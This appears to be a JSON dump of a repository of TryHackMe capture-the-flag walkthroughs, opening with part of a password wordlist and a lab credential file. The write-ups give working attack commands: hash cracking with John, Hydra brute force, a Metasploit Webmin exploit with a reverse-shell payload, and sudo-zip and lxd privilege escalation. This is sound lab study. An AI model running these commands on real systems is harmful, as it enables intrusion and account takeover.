r\nflip88\r\nflip85\r\nflip77\r\nflip623\r\nflip4u\r\nflip4fun\r\nflip28\r\nflip24\r\nflip22flip\r\nflip2008\r\nflip14\r\nflip07\r\nflip04\r\nflintshire\r\nflintoff12\r\nflintlock1\r\nflinthill\r\nflinter\r\nflinta\r\nflint16\r\nflint15\r\nflint12\r\nflinston\r\nflinky\r\nflink\r\nflinda\r\nflimmer\r\nflikster\r\nflikiti\r\nflikas\r\nfligirl\r\nflighty\r\nflightlead\r\nflightattendant\r\nflight99\r\nflight97\r\nflight7\r\nflight45\r\nflight3\r\nflight29down\r\nflight24\r\nflight19\r\nflight15\r\nflight101\r\nflight05\r\nflicker2\r\nflickchick\r\nflicka18\r\nflicka15\r\nflicka14\r\nflick5\r\nflick4\r\nflick07\r\nflicek\r\nflht95\r\nflgirl1\r\nflflfl\r\nflexxy\r\nflexter\r\nflexit\r\nflexin12\r\nflexibledoor38\r\nflexible07\r\nflexibility\r\nflexable\r\nflex_99\r\nflex26\r\nflex2000\r\nflex08\r\nfleurtje1\r\nfleurie\r\nfleuri\r\nfleurd\r\nfleur78\r\nfleur4\r\nfleur2005\r\nfleur1969\r\nfleur14\r\nfleur13\r\nfleur11\r\nfleur03\r\nfleur01\r\nflett1685\r\nflett\r\nfletchercharlye\r\nfletcher7\r\nfletcher17\r\nfletcher11\r\nfletch4\r\nfletch321\r\nfletch3\r\nfletch08\r\nflessa\r\nfleshnbone\r\nflesh666\r\nflemita\r\nflemishgrl\r\nflemish\r\nfleming84\r\nfleming2\r\nfleming123\r\nflembo\r\nflemball\r\nflemas\r\nflekken\r\nfleitas\r\nflefle\r\nfleenor\r\nfleemco\r\nfleeleg1\r\nfleebag\r\nfledermaus\r\nfleckyboy\r\nfleck\r\nfleamart1\r\nfleagle\r\nfleaflea\r\nflea45\r\nflea22\r\nflea19\r\nflea12\r\nflea05\r\nflcl16\r\nflcl123\r\nflays\r\nflaxseed\r\nflawless6\r\nflawless16\r\nflawless08\r\nflawed1\r\nflavours\r\nflavor69\r\nflavor5\r\nflavor23\r\nflavor!\r\nflavior\r\nflavio15\r\nflavio0\r\nflavinho\r\nflavia23\r\nflavia11\r\nflaverflav\r\nflavah\r\nflavagirl\r\nflavaflav1\r\nflava123\r\nflaure\r\nflatts3\r\nflatts13\r\nflatts1\r\nflattop\r\nflatspot\r\nflats\r\nflatron01\r\nflatout2\r\nflatline1\r\nflatlin3\r\nflatlands\r\nflatface\r\nflatcat\r\nflatboy\r\nflatball\r\nflatabs\r\nflat999cod999\r\nflat999\r\nflashy23\r\nflashy12\r\nflasho\r\nflashnell\r\nflashme\r\nflashleopard\r\nflashito\r\nflashieass\r\nflashes08\r\nflashers\r\nflashcards\r\nflashbox\r\nflashash\r\nflash95\r\nflash91\r\nflash88\r\nflash72\r\nflash411\r\nflash28\r\nflash223\r\nflash19\r\nflash16\r\nflash100\r\nflash09\r\nflash02\r\nflash001\r\nflash00\r\nflarp\r\nflarion\r\nflare1\r\nflaquito17\r\nflaquito001\r\nflaquita93\r\nflaquita9\r\nflaquita3\r\nflaquita25\r\nflaquita21\r\nflaquita2\r\nflaquita16\r\nflaquita15\r\nflaquita14\r\nflaquita07\r\nflaquita0206\r\nflaquit\r\nflaquisima\r\nflaqui18\r\nflaqito\r\nflaqis\r\nflaps\r\nflappy1\r\nflappie1\r\nflapjacks1\r\nflapingbird\r\nflapie\r\nflannigan\r\nflannan\r\nflanna\r\nflanker1\r\nflanigan1\r\nflanger\r\nflange69\r\nflange1\r\nflang\r\nflanel\r\nflander\r\nflanax\r\nflanagan1\r\nflamurtari\r\nflamson\r\nflammy89\r\nflammy\r\nflammie\r\nflammang\r\nflaminio\r\nflaminhot1\r\nflamingos1\r\nflamingo99\r\nflamingo32\r\nflamingo27\r\nflamingo18\r\nflamingo14\r\nflamingo1190\r\nflamingo11\r\nflamingo10\r\nflamingo06\r\nflaminco\r\nflamez14\r\nflamez1\r\nflamex\r\nflamess\r\nflames8\r\nflames666\r\nflames456\r\nflames44\r\nflames3\r\nflames28\r\nflames222\r\nflames16\r\nflames06\r\nflameroad\r\nflamer13\r\nflamer123\r\nflameon4\r\nflamenko\r\nflamengos\r\nflamengo10\r\nflamen\r\nflamelord\r\nflamegirl1\r\nflameflame\r\nflamee\r\nflamedramon\r\nflameball\r\nflame95\r\nflame89\r\nflame88\r\nflame666\r\nflame24\r\nflame18\r\nflame15\r\nflame143\r\nflame1234\r\nflame100\r\nflame06\r\nflame0\r\nflamanda\r\nflamaboy\r\nflama\r\nflaky26\r\nflakucha\r\nflakteamo\r\nflaks\r\nflakos\r\nflako3\r\nflako20\r\nflako14\r\nflako123\r\nflako12\r\nflakka\r\nflakitos\r\nflakitolindo\r\nflakito17\r\nflakitatqm\r\nflakitamoxa\r\nflakitaa\r\nflakita89\r\nflakita7\r\nflakita69\r\nflakita3\r\nflakita27\r\nflakita14\r\nflakita08\r\nflakita06\r\nflakisss\r\nflakiss29\r\nflakiss21\r\nflakis17\r\nflakis13\r\nflakis05\r\nflakiito\r\nflakbella\r\nflakatkm\r\nflakateamo\r\nflaka93\r\nflaka91\r\nflaka87\r\nflaka8\r\nflaka4life\r\nflaka305\r\nflaka24\r\nflaka20\r\nflaka10\r\nflaka.25\r\nflak88\r\nflak08\r\nflair22\r\nflagsrule\r\nflags2\r\nflags101\r\nflagirl\r\nflagflag\r\nflagator\r\nflag93\r\nflag890\r\nflag2006\r\nflag11\r\nflacus\r\nflacuchento\r\nflacota\r\nflacoo\r\nflaco9\r\nflaco89\r\nflaco6\r\nflaco27\r\nflaco22\r\nflaco20089\r\nflaco1995\r\nflaco17\r\nflaco09\r\nflaco05\r\nflacita\r\nflacari\r\nflacaman\r\nflacalaca\r\nflacae\r\nflacac\r\nflacabuena\r\nflacabonita\r\nflaca_13\r\nflaca989\r\nflaca9670\r\nflaca88\r\nflaca86\r\nflaca85\r\nflaca77\r\nflaca609\r\nflaca4life\r\nflaca4\r\nflaca34\r\nflaca33\r\nflaca214\r\nflaca2008\r\nflaca2006\r\nflaca2004\r\nflaca1982\r\nflaca101\r\nflaca04\r\nflaca*\r\nflaca!\r\nflabtastic\r\nflabio\r\nflabia\r\nfla407\r\nfl9358\r\nfl8989\r\nfl4life\r\nfl34747\r\nfl33605\r\nfl33433\r\nfl33177\r\nfl33071\r\nfl33065\r\nfl33023\r\nfl32837\r\nfl32817\r\nfl32544\r\nfl32210\r\nfl32068\r\nfl2802\r\nfl2315\r\nfl2008\r\nfl1rt\r\nfl1pflop\r\nfl123456\r\nfl1234\r\nfl1000\r\nfl0werp0wer\r\nfl0ppy\r\nfktv2005\r\nfktlc99\r\nfks2e9p7eg\r\nfkq84kwc\r\nfkntdk05\r\nfkmefkme\r\nfkieren_12\r\nfkdifkdi\r\nfkaylee558\r\nfk;fk;\r\nfk4hm61\r\nfjx100pre\r\nfjrt09\r\nfjr3samh\r\nfjpogi\r\nfjoshua\r\nfjernsyn\r\nfjeidkvn7\r\nfjdksla\r\nfjavier\r\nfjac7un6\r\nfja241\r\nfj8kb5\r\nfj5215505\r\nfj0231\r\nfizzys\r\nfizzypop123\r\nfizzypigs\r\nfizzylizzy\r\nfizzygirl\r\nfizzycola\r\nfizzybomb\r\nfizzyb\r\nfizzy72\r\nfizzy27\r\nfizzy22\r\nfizzy2\r\nfizzy14\r\nfizzy12\r\nfizzwizz\r\nfizzman\r\nfizzleme\r\nfizzle9\r\nfizzle2\r\nfizzle12\r\nfizzgigg\r\nfizzfizz22\r\nfizzers\r\nfizzer1\r\nfizz26\r\nfizz2006\r\nfizz16\r\nfizz1234\r\nfizz11\r\nfizz01\r\nfizuck\r\nfizik\r\nfizgig1\r\nfizbom\r\nfizah93\r\nfizafiza\r\nfiza80\r\nfiza1234\r\nfiza123\r\nfiz123\r\nfiyana\r\nfiya19\r\nfixtures\r\nfixit1\r\nfixfix\r\nfixedme\r\nfixativ\r\nfivezero\r\nfiveten\r\nfiveseven\r\nfives5\r\nfivelove\r\nfivefour1\r\nfiveforfighting\r\nfivefive55\r\nfivefeet\r\nfivedollars\r\nfivedogs\r\nfiveaday\r\nfive55555\r\nfive5555\r\nfive5347\r\nfive50\r\nfive31\r\nfive25\r\nfive2007\r\nfive20\r\nfive16\r\nfive11\r\nfive10\r\nfive000\r\nfive-0\r\nfiuinha\r\nfitzze\r\nfitzy13\r\nfitzy123\r\nfitzy12\r\nfitzy07\r\nfitzy00\r\nfitzroy1\r\nfitzory\r\nfitzgerald7\r\nfitzgearld\r\nfitzee\r\nfitzalan\r\nfittymari\r\nfittycent\r\nfittness\r\nfitte\r\nfitrum\r\nfitrii\r\nfitri95\r\nfitri94\r\nfitri88\r\nfitri3\r\nfitree\r\nfitos\r\nfitofito\r\nfito11\r\nfitness25\r\nfitness21\r\nfitness19\r\nfitness101\r\nfitness07\r\nfitmac\r\nfitlivigurl\r\nfitlike1\r\nfitlad\r\nfitim\r\nfitiavana\r\nfitiaa\r\nfithriani\r\nfithri\r\nfither\r\nfitguy\r\nfitgirl1\r\nfitboyz\r\nfitboy2\r\nfitbabe1\r\nfitba\r\nfitasfcuk\r\nfitan\r\nfitafita\r\nfit2me\r\nfit123\r\nfit-toz\r\nfistik\r\nfisniku\r\nfisniki\r\nfisker\r\nfisip\r\nfisiot\r\nfisiopower\r\nfisico-quimica\r\nfishypie\r\nfishygirl\r\nfishy95\r\nfishy777\r\nfishy77\r\nfishy45\r\nfishy321\r\nfishy21\r\nfishy19\r\nfishy18\r\nfishy14\r\nfishy111\r\nfishwish\r\nfishwife\r\nfishwater\r\nfishu\r\nfishtx\r\nfishtown1\r\nfishtoft\r\nfishtanks\r\nfishtank40\r\nfishtank3\r\nfishtale\r\nfishswim\r\nfishstix9\r\nfishstick2\r\nfishst1x\r\nfishrule\r\nfishrider\r\nfishrcool\r\nfishpot\r\nfishout\r\nfishon420\r\nfishnuts\r\nfishn1\r\nfishmouth\r\nfishline\r\nfishking\r\nfishinmiss\r\nfishing92\r\nfishing83\r\nfishing67\r\nfishing4eva\r\nfishing33\r\nfishing30\r\nfishing28\r\nfishing27\r\nfishing21\r\nfishing2008\r\nfishing2006\r\nfishing19\r\nfishing007\r\nfishie5\r\nfishie4\r\nfishie23\r\nfishhunt\r\nfishgutz\r\nfishguts1\r\nfishguard\r\nfishgold\r\nfishgal\r\nfishfuker\r\nfishfrog\r\nfishforlife\r\nfisheye1\r\nfishes9\r\nfishes5\r\nfishes!\r\nfishers1\r\nfisherman!\r\nfishergirl\r\nfisherboy\r\nfisher9\r\nfisher88\r\nfisher73\r\nfisher27\r\nfisher15\r\nfisher13\r\nfisher06\r\nfishen\r\nfishegg\r\nfished1\r\nfishdog2\r\nfishcutter\r\nfishcat1\r\nfishcake5\r\nfishbulb\r\nfishbubbles\r\nfishbox\r\nfishbowl1\r\nfishbol\r\nfishbate\r\nfishbass\r\nfish95\r\nfish888\r\nfish86\r\nfish84\r\nfish7878\r\nfish64\r\nfish56\r\nfish4u\r\nfish4fish\r\nfish4444\r\nfish3299\r\nfish3\r\nfish2424\r\nfish221\r\nfish2007\r\nfish2004\r\nfish2000\r\nfish20\r\nfish2\r\nfish1993\r\nfish1984\r\nfish1978\r\nfish0620\r\nfish03\r\nfish001\r\nfish-pie\r\nfischkopf\r\nfischer2\r\nfiscalidade\r\nfisbicne\r\nfis123\r\nfirzanah\r\nfirza\r\nfiruss\r\nfirulaiz\r\nfirula\r\nfirufiru\r\nfirthy\r\nfirtha\r\nfirth\r\nfirsya\r\nfirstweek\r\nfirsttimer\r\nfirsttime1\r\nfirstt\r\nfirsts1\r\nfirstpoint\r\nfirstplace\r\nfirstman\r\nfirstlove!\r\nfirstkiss7\r\nfirstkid\r\nfirstime\r\nfirstevil\r\nfirstcoast\r\nfirstar1\r\nfirstaider\r\nfirst87\r\nfirst84\r\nfirst3\r\nfirst28\r\nfirst21\r\nfirst16\r\nfirst15\r\nfirst13\r\nfirst111\r\nfirst love\r\nfirpo13\r\nfirmware\r\nfirmount\r\nfirmamento\r\nfirmager\r\nfirma\r\nfirkin\r\nfirjani\r\nfirina\r\nfirexx\r\nfireworksjj\r\nfireworks!\r\nfirework1\r\nfirewolf1\r\nfirewithin\r\nfirewitch\r\nfirewall123\r\nfirever\r\nfireup1\r\nfiretruck5\r\nfiretree\r\nfiretouch\r\nfireteam1\r\nfiretalk\r\nfiresued\r\nfirestrike\r\nfirestones\r\nfirestix\r\nfirespirit\r\nfirespin\r\nfires1\r\nfirerules\r\nfirered123\r\nfirerat\r\nfirequeen\r\nfirepogi\r\nfirepit\r\nfirephoenix\r\nfireofhell\r\nfirenza\r\nfirentze\r\nfirenoob123\r\nfiremetal\r\nfireman91\r\nfireman88\r\nfireman87\r\nfireman86\r\nfireman83\r\nfireman81\r\nfireman55\r\nfireman45\r\nfireman32\r\nfireman25\r\nfireman1018\r\nfireman*9\r\nfiremage1\r\nfirely\r\nfirelover313\r\nfirelover\r\nfirelite\r\nfirelinks\r\nfirelilly\r\nfireland\r\nfirehot1\r\nfirehearts\r\nfiregril\r\nfiregoddess\r\nfiregirl12\r\nfiregard\r\nfiregal\r\nfirefox88\r\nfirefox7\r\nfirefox69\r\nfirefox6\r\nfirefox5\r\nfirefox4\r\nfirefox21\r\nfirefox2\r\nfirefox123\r\nfireforge\r\nfireforever\r\nfireflyz\r\nfireflys\r\nfirefly83\r\nfirefly69\r\nfirefly4\r\nfirefly18\r\nfirefly15\r\nfirefly14\r\nfirefly08\r\nfirefly01\r\nfirefly.\r\nfirefly*\r\nfirefloss\r\nfirefli1\r\nfireflames\r\nfirefighting\r\nfirefighter570\r\nfirefighter4\r\nfireemail\r\nfireee\r\nfireeagle\r\nfiredogs\r\nfiredog101\r\nfired\r\nfirecrow\r\nfirechick1\r\nfirechic911\r\nfirecat1\r\nfireburst\r\nfireburns\r\nfirebugs\r\nfirebug4life\r\nfirebug22\r\nfirebolt13\r\nfireboi\r\nfireblazer\r\nfireblades\r\nfireblade9\r\nfirebird97\r\nfirebird94\r\nfirebird91\r\nfirebird87\r\nfirebird84\r\nfirebird8\r\nfirebird79\r\nfirebird73\r\nfirebird6\r\nfirebird5\r\nfirebird21\r\nfirebird1999\r\nfirebird13\r\nfirebird12\r\nfirebird10\r\nfirebird08\r\nfirebird!\r\nfireband\r\nfireball9\r\nfireball77\r\nfireball4\r\nfireball3\r\nfireball24\r\nfireball17\r\nfireball16\r\nfireball123\r\nfireball08\r\nfirebaby2\r\nfireba11\r\nfireb\r\nfireatwill\r\nfireantz1\r\nfirealarm1\r\nfirealarm\r\nfireal1022\r\nfire9111\r\nfire90\r\nfire84\r\nfire817\r\nfire81\r\nfire804jam561\r\nfire802\r\nfire80\r\nfire789\r\nfire78\r\nfire777\r\nfire75\r\nfire74\r\nfire68\r\nfire65\r\nfire64\r\nfire62\r\nfire619\r\nfire60\r\nfire52\r\nfire51\r\nfire50\r\nfire4me\r\nfire4life\r\nfire4him\r\nfire4ever\r\nfire42\r\nfire4\r\nfire321\r\nfire300\r\nfire247\r\nfire221\r\nfire214\r\nfire2008\r\nfire2006\r\nfire2004\r\nfire1996\r\nfire1993\r\nfire1976\r\nfire12345\r\nfire1157\r\nfire111\r\nfire009\r\nfire red\r\nfirdha\r\nfirdaus94\r\nfirdaus92\r\nfirdaus83\r\nfirdas\r\nfirdan\r\nfircroft\r\nfiraxis\r\nfira123\r\nfir3man\r\nfir1985\r\nfiqah92\r\nfioteamo\r\nfiorita\r\nfiorino\r\nfiorillo\r\nfiorella86\r\nfiorella27\r\nfiorella19\r\nfiorella18\r\nfiorella12\r\nfiorella11\r\nfiorella10\r\nfiorela1\r\nfiore24\r\nfiore1989\r\nfiore1\r\nfiordalisa\r\nfiora\r\nfionn_21\r\nfionina\r\nfione\r\nfionar\r\nfionap\r\nfionan\r\nfionamc\r\nfionaf\r\nfionadog\r\nfionabell\r\nfiona99\r\nfiona92\r\nfiona91\r\nfiona75\r\nfiona7382\r\nfiona56\r\nfiona30\r\nfiona26\r\nfiona2007\r\nfiona20\r\nfiona1992\r\nfiona15\r\nfiona1234\r\nfiona100\r\nfiona084\r\nfiona04\r\nfiona03\r\nfion1817\r\nfion1230\r\nfiodental\r\nfio1984\r\nfio123\r\nfinzer\r\nfinuta\r\nfinura\r\nfintas\r\nfinstock\r\nfinsland\r\nfinsfan\r\nfinrod\r\nfinos\r\nfinolis\r\nfinolanew\r\nfinocchio\r\nfino555\r\nfinny77\r\nfinny7\r\nfinnly\r\nfinnest\r\nfinness\r\nfinndog\r\nfinnan3\r\nfinnagain\r\nfinn2007\r\nfinn2006\r\nfinn2004\r\nfinn06\r\nfinn\r\nfinley7\r\nyomami1\r\nyomamen\r\nyomamasofat\r\nyomamas\r\nyomamajomama\r\nyomamaa\r\nyomama9223\r\nyomama91\r\nyomama909\r\nyomama89\r\nyomama786\r\nyomama619\r\nyomama56\r\nyomama555\r\nyomama415\r\nyomama321\r\nyomama24\r\nyomama200\r\nyomama16\r\nyomama15\r\nyomama12345\r\nyomama100\r\nyomama07\r\nyomama03\r\nyomama-\r\nyomalita\r\nyomali1996\r\nyomale\r\nyomaka\r\nyomajiesda\r\nyomaira8\r\nyomaira26\r\nyomaira22\r\nyomaira1\r\nyomah\r\nyomac\r\nyomaan\r\nyoma25\r\nyoma123\r\nyolza\r\nyolyyoly\r\nyolys\r\nyolyol\r\nyolymar\r\nyolycrispi\r\nyoly4949\r\nyoly328\r\nyoly2861\r\nyoly21\r\nyoly200\r\nyoly1989\r\nyoly1700\r\nyoly17\r\nyoly15\r\nyoly06\r\nyoly\r\nyoluis\r\nyoltir\r\nyolpploy\r\nyolp91961\r\nyoloxochitl\r\nyolove14\r\nyolovalgomasketu\r\nyolotli\r\nyolosetodo\r\nyolosamo001\r\nyolori\r\nyolones1\r\nyolonda200\r\nyolomaximo\r\nyoloamoael\r\nyoloamo1\r\nyolo69\r\nyolo1212\r\nyolmarie\r\nyollys\r\nyollymark\r\nyolly1\r\nyollotzin\r\nyollotl\r\nyollis03\r\nyollis\r\nyollierobert3\r\nyolli\r\nyollhy2\r\nyollamrad\r\nyoliyoli\r\nyolix\r\nyolitzin\r\nyolis19\r\nyolis17\r\nyolis14\r\nyolis0515\r\nyolireyes\r\nyolion\r\nyolioli\r\nyolindacomosiempre\r\nramirezfamily\r\nramirezb\r\nramirez99\r\nramirez93\r\nramirez92\r\nramirez86\r\nramirez81\r\nramirez77\r\nramirez76\r\nramirez7269@sbcglobal.net\r\nramirez724\r\nramirez417\r\nramirez29\r\nramirez26\r\nramirez228810\r\nramirez200\r\nramirez1995\r\nramirez1992\r\nramirez147\r\nramirez14\r\nramirez100\r\nramirez07\r\nramirez00\r\nramirex\r\nramires2\r\nramires1\r\nramirejd\r\nramiray\r\nramir143\r\nramins\r\nraming1892\r\nramine\r\nraminder\r\nraminator\r\nraminamin\r\nramilton\r\nramilsalvador\r\nramilove\r\nramilmg\r\nramillete\r\nramill\r\nramilko\r\nramiljoy\r\nramilito\r\nramilita\r\nramilie\r\nramilgica\r\nramiley\r\nramilejo643\r\nramile\r\nramildiaz\r\nramilcute\r\nramilca\r\nramilb\r\nramilan\r\nramil28\r\nramil25\r\nramil19\r\nramil14\r\nramil13\r\nramil03\r\nramil013\r\nramikas\r\nramikah123\r\nramika\r\nramierz20\r\nramielle\r\nramie1\r\nramicom\r\nramick\r\nramich\r\nramibel\r\nrami99\r\nrami89\r\nrami4me\r\nrami2mona\r\nrami26\r\nrami22\r\nrami1992\r\nrami1985\r\nrami18\r\nrami15\r\nrami123\r\nrami1127\r\nrami10\r\nrami09\r\nrami0317\r\nrami0303\r\nramhad\r\nramgopal\r\nramgoolam\r\nramgle\r\nramgar\r\nramgang78\r\nramfer\r\nramfan1\r\nramfam5\r\nramezlfo\r\nmichelle\r\ntigger\r\nsunshine" }, { "path": "Easy-Peasy/hash.txt", "content": "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" }, { "path": "Easy-Peasy/secrettext.txt", "content": "username:boring\npassword:\n01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001\n" }, { "path": "Encryption-Crypto-101/README.md", "content": "# Encryption - Crypto 101\n\n- I'm ready to learn about encryption\n\n\t no answer needed\n\n- I agree not to complain too much about how theory heavy this room is.\n\n\t no answer needed\n\n- Are SSH keys protected with a passphrase or a password?\n\n\t- `passphrase`\n\n- What does SSH stand for?\n\n\t- `secure shell`\n\n- How do webservers prove their identity?\n\n\t- `certificate`\n\n- What is the main set of standards you need to comply with if you store or process payment card details?\n\n\t- `PCI-DSS`\n\n- What's 30 % 5?\n\n\t- `0`\n\n- What's 25 % 7\n\n\t- `4`\n\n- What's 118613842 % 9091\n\n\t- `python3`\n\t- `118613842 % 9091`\n\t- `****`\n\n- Should you trust DES? Yea/Nay\n\n\t- `Nay`\n\n- What was the result of the attempt to make DES more secure so that it could be used for longer?\n\n\t- Google it!\n\n- Is it ok to share your public key? Yea/Nay\n\n\t- `Yea`\n\n- p = 4391, q = 6659. What is n?\n\n\t- `python3`\n\t- `4391 * 6659`\n\t- `********`\n\n- I understand enough about RSA to move on, and I know where to look to learn more if I want to.\n\n\t no answer needed\n\n- I understand how keys can be established using Public Key (asymmetric) cryptography. \n\n\t no answer needed\n\n- What company is TryHackMe's certificate issued to?\n\n\t- In your browser click on the lock icon near to the URL of tryhackme.\n\t- Look at the certificate.\n\t- `**********`\n\n- I recommend giving this a go yourself. Deploy a VM, like Learn Linux and try to add an SSH key and log in with the private key.\n\n\t no answer needed\n\n- Download the SSH Private Key attached to this room.\n\n\t no answer needed\n\n- What algorithm does the key use?\n\n\t- `rsa`\n\n- Crack the password with John The Ripper and rockyou, what's the passphrase for the key?\n\n\t- `python2 /usr/share/john/ssh2john.py idrsa.id_rsa > id_rsa.hash`\n\t- `john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash`\n\t- `*********`\n\n- I understand how Diffie Hellman Key Exchange works at a basic level\n\n\t no answer needed\n\n- Time to try some GPG. Download the archive attached and extract it somewhere sensible.\n\n\t no answer needed\n\n- You have the private key, and a file encrypted with the public key. Decrypt the file. What's the secret word?\n\n\t- `gpg --import tryhackme.key`\n\t- `gpg -d message.gpg`\n\t- `*********`\n\n- I understand that quantum computers affect the future of encryption. I know where to look if I want to learn more.\n\n\t no answer needed\n\n\n\n\n\n" }, { "path": "Erit-Securus-I/README.md", "content": "# Erit Securus I\n\n- Deploy box\n\n\t no answer needed\n\n- How many ports are open?\n\n\t- `scilla port -target `\n\t- `2`\n\n- What ports are open? Comma separated, lowest first: `**,**`\n\n\t- `**,**`\n\n- What CMS is the website built on?\n\n\t- `bolt`\n\n- In the exploit from 2020-04-05, what language is used to write the exploit?\n\n\t- `python`\n\n- As the exploit is authenticated, you will also need a username and password. Knowing the URI for the login-portal is also critical for the exploit to work. Find the login-portal and try login in.\n\n\t no answer needed\n\n- What is the username of the user running the web server?\n\n\t- `www-data`\n\n- What is the users password?\n\n\t- `sqlite3 bolt.db`\n\t- `.tables`\n\t- `select * from bolt_users;`\n\t- `echo '$2y$*****************************************************' > hash`\n\t- `*********`\n\n- Flag 1\n\n\t- `su wileec`\n\t- `cat flag1.txt`\n\t- `********************`\n\n- User wileec can sudo! What can he sudo?\n\n\t- `(*******) NOPASSWD: /usr/bin/***`\n\n- Flag 2\n\n\t- `$ TF=$(mktemp -u)`\n\t- `sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'`\n\t- `sudo rm $TF`\n\t- `SHELL=/bin/bash script -q /dev/null`\n\t- `ls`\n\t- `cat flag2.txt`\n\t- `********************************`\n\n- What sudo rights does jsmith have?\n\n\t- `(ALL : ALL) NOPASSWD: ALL`\n\n- Flag 3\n\n\t- `sudo -s`\n\t- `cd /root/`\n\t- `ls`\n\t- `cat flag3.txt`\n\t- `****************************************`\n" }, { "path": "Game-Zone/README.md", "content": "# Game Zone\n\n- Deploy the machine and access its web server.\n\n\t no answer needed\n\n- What is the name of the large cartoon avatar holding a sniper on the forum?\n\n\t- `Agent 47`\n\n- Here is a potential place of vulnerability, as you can input your username as another SQL query. This will take the query write, place and execute it.\n\n\t no answer needed\n\n- The extra SQL we inputted as our password has changed the above query to break the initial query and proceed (with the admin user) if 1==1, then comment the rest of the query to stop it breaking.\n\n\t no answer needed\n\n- When you've logged in, what page do you get redirected to?\n\n\t- `portal.php`\n\n- In the users table, what is the hashed password?\n\n\t- `ab5db915fc9cea6c78df88106c6500c57f2b***************************`\n\n- What was the username associated with the hashed password?\n\n\t- `agent47`\n\n- What was the other table name?\n\n\t- `post`\n\n- Once you have JohnTheRipper installed you can run it against your hash.\n\n\t no answer needed\n\n- What is the de-hashed password?\n\n\t- `video*******`\n\n- What is the user flag?\n\n\t- `ssh agent47@`, `yes` and enter password.\n\t- `pwd`\n\t- `ls`\n\t- `cat user.txt`\n\t- `***********************`\n\n - How many TCP sockets are running?\n\n\t- `5`\n\n- What is the name of the exposed CMS?\n\n\t- `webmin`\n\n- What is the CMS version?\n\n\t- `1.580`\n\n- What is the root flag?\n\n\t- `msfconsole`\n\t- `search webmin 1.580`\n\t- `use 1`\n\t- `set payload cmd/unix/reverse`\n\t- `set PASSWORD ************`\n\t- `set USERNAME agent47`\n\t- `set LHOST `\n\t- `SET RHOSTS 127.0.0.1`\n\t- `SET RPORT 10000`\n\t- `run`\n\t- `pwd`\n\t- `cat /root/root.txt`\n\t- `*************************`\n\n\n\n\n" }, { "path": "GamingServer/README.md", "content": "# GamingServer\n\n- What is the user flag?\n\n\t- Visit `http://`.\n\t- `scilla port -target -p -1000`\n\t- Two ports open. 22 and 80.\n\t- `scilla dir -target `\n\t~~~\n\t[+]FOUND: http:///uploads/ 200 OK\n\t[+]FOUND: http:///secret/ 200 OK\n\t~~~\n\t- Found a dictionary of passwords in uploads (dict.lst) and a RSA private key.\n\t- Save these two files.\n\t- `python2 /usr/share/john/ssh2john.py rsa_priv > id_rsa.hash`\n\t- `john -w dict.lst id_rsa.hash`\n\t- `chmod 600 rsa_priv`\n\t- `ssh john@ -i rsa_priv`. We know the user is john from the website.\n\t- `ls`\n\t- `cat user.txt`\n\t- `*********************************`\n\n- What is the root flag?\n\n\t- john is in the `lxd` group.\n\t- So download the [lxd Alpine Builder](https://github.com/saghul/lxd-alpine-builder).\n\t- `git clone https://github.com/saghul/lxd-alpine-builder.git`\n\t- `cd lxd-alpine-builder`\n\t- `sudo ./build-alpine`\n\t- `python3 -m http.server`\n\t- On target `wget http://:8000/alpine-*****************.tar.gz`\n\t- `lxc image import ./alpine-*****************.tar.gz --alias myimage`\n\t- `lxc init myimage ignite -c security.privileged=true`\n\t- `lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true`\n\t- `lxc start ignite`\n\t- `lxc exec ignite /bin/sh`\n\t- `id`\n\t- `cat /mnt/root/root/root.txt `\n\t- `********************************`\n\n\n\n\n\n" }, { "path": "Geolocating-Images/README.md", "content": "# Geolocating Images\n\n- Download the zip file\n\n\tno answer needed\n\n- Where in the world is image 1? The answer is the country name.\n\n\t- Use [yandex](https://yandex.com/images/search)\n\t- `china`\n\n- no title\n\n\tno answer needed\n\n- Where was image 2 taken?\n\n\t- Search on Google `W Shieffield av. Addison av.`\n\t- You should get a result of Chigaco street.\n\t- Switch to street view.\n\t- `*******************`\n\n- Read the above material\n\n\tno answer needed\n\n- Where was image 3 taken?\n\n\t- Tried with Google dork, maps, shodan, other engines, exiftool, nothing.\n\t- Then I tried with some informations, such as Paris cemetery.. and so on.\n\t- Finally I searched for Paris Observatory.\n\t- `Meudon Observatory`\n\n- Where is image 4 taken?\n\n\t- `Abbey road` :P\n\n\n\n" }, { "path": "Getting-Started/README.md", "content": "# Getting Started\n\n- What is the name of the hidden admin page?\n\n\t- Inspect page source code\n\t- `/test-admin`\n\n- What is the username and password in the form username:password?\n\n\t- `admin:admin`\n\n- How many user are signed up to the application?\n\n\t- `3`\n\n\n\n\n" }, { "path": "GoldenEye/README.md", "content": "# GoldenEye\n\n![Bond](https://github.com/edoardottt/tryhackme-ctf/blob/main/GoldenEye/goldeneye.jpg)\n\n- First things first, connect to our network and deploy the machine.\n\n\t no answer needed\n\n- Use nmap to scan the network for all ports. How many ports are open?\n\n\t- `nmap -p- ` or\n\t- `scilla port -target `\n\t- `4`\n\n- Take a look on the website, take a dive into the source code too and remember to inspect all scripts!\n\n\t no answer needed\n\n- Who needs to make sure they update their default password?\n\n\t- `Boris`\n\n- Whats their password?\n\n\t- Go to [CyberChef](https://gchq.github.io/CyberChef) and set recipe From HTML Entity.\n\t- `****************`\n\n- Now go use those credentials and login to a part of the site.\n\t\n\t no answer needed\n\t\n\t- Go to `/sev-home/` and enter username (boris) and password.\n\n- Take a look at some of the other services you found using your nmap scan. Are the credentials you have re-usable?\n\n\t no answer needed\n\n- If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra?Whats their new password?\n\n\t- `hydra -l boris -P /data/src/wordlists/fasttrack.txt pop3://:55007`\n\t- `*******`\n\n- Inspect port 55007, what services is configured to use this port?\n\n\t- `telnet`\n\n- Login using that service and the credentials you found earlier.\n\n\t no answer needed\n\n- What can you find on this service?\n\n\t- `emails`\n\n- What user can break Boris' codes?\n\n\t- `natalya`\n\n- Using the users you found on this service, find other users passwords\n\n\t no answer needed\n\n- Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.\n\n\t no answer needed\n\n- If you remembered in some of the emails you discovered, there is the severnaya-station.com website. To get this working, you need up update your DNS records to reveal it.\n\n\t no answer needed\n\n- Once you have done that, 